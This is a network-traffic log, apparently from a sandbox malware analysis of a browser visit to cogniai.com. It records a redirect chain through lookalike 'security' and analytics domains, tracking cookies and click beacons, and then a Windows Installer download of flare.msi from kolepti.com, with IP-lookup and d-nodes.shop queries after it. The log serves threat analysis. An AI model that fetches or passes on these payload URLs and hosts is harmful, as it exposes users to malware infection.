Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-5.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/11/OpenAI-Logo-PNG.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/11/pngwing.com-1.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/11/google-logo-9831.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/11/SNOW_BIG.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/11/62067060d7b91b0004122615.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=6.8.1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/css/fonts/flaticona1f9.ttf?1895e337cdf1a9a72d08e55e17b16599 HTTP/1.1host: cogniai.comorigin: https://cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://cogniai.com/wp-content/themes/techze/css/flaticon.css?ver=1accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/css/fonts/Flaticon.woff HTTP/1.1host: cogniai.comorigin: https://cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://cogniai.com/wp-content/themes/techze/css/flaticon.css?ver=1accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4
Source: global traffic	HTTP traffic detected: GET /A3fB7c10eD2aF5b8/?wsid=cogniai.com&domain=Y29nbmlhaS5jb20=&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n HTTP/1.1host: analytiscnode.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: documentreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/ss2-1.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2024/09/cyberpunk-illustration-with-neon-colors-futuristic-technology-1-scaled.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/ss4-1-1.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/ss3-1.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /9a8B7c6D5e4F3a2B1c0D9e8F7a6B5c?wsid=cogniai.com&domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n HTTP/1.1host: security.flaweguaard.comupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"referer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /releases/v5.15.4/css/free-v4-font-face.min.css?token=e8bbb49528 HTTP/1.1host: ka-f.fontawesome.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /releases/v5.15.4/css/free.min.css?token=e8bbb49528 HTTP/1.1host: ka-f.fontawesome.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /releases/v5.15.4/css/free-v4-shims.min.css?token=e8bbb49528 HTTP/1.1host: ka-f.fontawesome.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /?domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n HTTP/1.1host: security.flaweguaard.comupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"referer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /api/getUrl HTTP/1.1host: analytiwave.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/projects-ai-1.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/projects-ai-2.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-5.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-4.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-3.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/11/OpenAI-Logo-PNG.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/11/SNOW_BIG.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/11/pngwing.com-1.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /api/getUrl HTTP/1.1host: analytiwave.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/11/62067060d7b91b0004122615.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/11/google-logo-9831.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/11/thumb_COGNIAI-Concept9-FF-01-1.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1host: security.flaweguaard.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imageaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.22631.4169/0?CH=902&L=en-US&P=&PT=0x30&WUA=1220.2407.15022.0&MK=4Orv2MymLvHkm74&MD=aW4zM21e HTTP/1.1host: slscr.update.microsoft.comaccept: /user-agent: Windows-Update-Agent/1220.2407.15022.0 Client-Protocol/2.80
Source: global traffic	HTTP traffic detected: GET /log-click HTTP/1.1host: security.flaweguaard.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1host: security.flaweguaard.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1host: security.flaweguaard.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1host: security.flaweguaard.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1host: security.flaweguaard.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1host: security.flaweguaard.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1host: security.flaweguaard.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /?verified=true HTTP/1.1host: cogniai.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: documentaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /flare.msi HTTP/1.1host: kolepti.comaccept: /user-agent: Windows Installer
Source: global traffic	HTTP traffic detected: GET /12180 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/?verified=trueaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.22631.4169/0?CH=902&L=en-US&P=&PT=0x30&WUA=1220.2407.15022.0&MK=4Orv2MymLvHkm74&MD=aW4zM21e HTTP/1.1host: slscr.update.microsoft.comaccept: /user-agent: Windows-Update-Agent/1220.2407.15022.0 Client-Protocol/2.80
Source: global traffic	HTTP traffic detected: GET /r/r1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: chrome.exe, 00000000.00000002.1953863051.0000016686FBD000.00000004.00000001.00040000.00000008.sdmp

String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: cogniai.com
Source: global traffic	DNS traffic detected: DNS query: ka-f.fontawesome.com
Source: global traffic	DNS traffic detected: DNS query: analytiwave.com
Source: global traffic	DNS traffic detected: DNS query: analytiscnode.com
Source: global traffic	DNS traffic detected: DNS query: security.flaweguaard.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: kolepti.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: d-nodes.shop
Source: global traffic	DNS traffic detected: DNS query: beacons.gcp.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: c.pki.goog
Source: global traffic	DNS traffic detected: DNS query: beacons.gvt2.com

Source: unknown

HTTP traffic detected: POST /report/v4?s=6cd1SddvBaFkfY4vp4z6squzRBnh4p8blvvJ6JFDBEHvgD4KToeL2%2FBNggV0XdBPQbUhRY%2B3KYBg%2FBfxSrbMAXAWSk8UlUXZPLs%2Fagw%3D HTTP/1.1host: a.nel.cloudflare.comcontent-length: 391content-type: application/reports+jsonorigin: https://analytiwave.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4, i

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 28 May 2025 21:04:34 GMTcontent-type: application/json; charset=utf-8server: cloudflarex-powered-by: Expressaccess-control-allow-origin: *etag: W/"17-ynud/rIoUFgqOK7lQmDhSVVNfYI"cf-cache-status: DYNAMICnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=6cd1SddvBaFkfY4vp4z6squzRBnh4p8blvvJ6JFDBEHvgD4KToeL2%2FBNggV0XdBPQbUhRY%2B3KYBg%2FBfxSrbMAXAWSk8UlUXZPLs%2Fagw%3D"}]}content-encoding: zstdcf-ray: 9470b486cbad5287-LAXalt-svc: h3=":443"; ma=86400content-length: 32
